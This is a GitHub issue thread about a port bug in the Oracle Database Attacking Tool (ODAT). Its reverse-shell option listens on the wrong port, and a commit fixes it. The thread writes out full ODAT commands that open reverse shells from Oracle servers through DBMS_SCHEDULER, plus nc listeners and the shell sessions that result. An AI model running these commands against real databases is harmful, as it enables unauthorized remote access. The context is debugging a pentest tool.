Closed reversebrain closed 8 years ago
Yes. Very strange...
I have just tested the latest development version and standalone version (v2.0) with the following command on a 12.1.0.2 database:
./odat.py dbmsscheduler -s 192.168.56.2 -d ORCL -U $user -P $password --reverse-shell 192.168.56.1 65534
I have the following output:
[1] (192.168.56.102:1521): Try to give you a reverse shell from the 192.168.56.2 server
[+] The python reverse shell tries to connect to 192.168.56.1:65534
Listening on [0.0.0.0] (family 0, port 65534)
Connection from [192.168.56.2] port 65534 [tcp/*] accepted (family 2, sport 29247)
sh: no job control in this shell
sh-4.2$ id
id
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Here is the netstat output:
netstat -antp | grep 65534
tcp 0 0 192.168.56.1:65534 192.168.56.2:29247 ESTABLISHED 3654/nc
For me, the reverse shell is established on the 65534 local port (2nd parameter of --reverse-shell). I can't reproduce your problem.
Thank you in advance,
I'm using the development version with Oracle Instant Client 11.1. This is my command:
sudo ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 --reverse-shell 10.10.72.110 443
This is the output:
[1] (127.0.0.1:9000): Try to give you a reverse shell from the 127.0.0.1 server
[+] The python reverse shell tries to connect to 10.10.72.110:443
443: inverse host lookup failed: Unknown host
listening on [any] 56657 ...
[+] The Job is running
I can get the reverse shell only performing this:
sudo nc -lvp 443
In fact this is the output:
listening on [any] 443 ...
192.168.101.7: inverse host lookup failed: Unknown host
connect to [10.10.72.110] from (UNKNOWN) [192.168.101.7] 50991
sh: no job control in this shell
sh-4.1$
The following commit should fix this issue: 1fb920e0ad56a36f8d1ca40a642225a273779895. Can you confirm?
Yes, I think that the problem is the -p parameter, which specifies the port to use.
EDIT: Yes, now it works, I retried to perform the same commands and now it is listening on the correct port. Thank you
You're welcome. Thank you for this bug report.
First of all, thank you for your tool! I noticed a strange problem executing the dbmsscheduler module with the reverse shell parameter. When odat starts listening on a specified port, it doesn't match the port written in input after the IP, but a random one.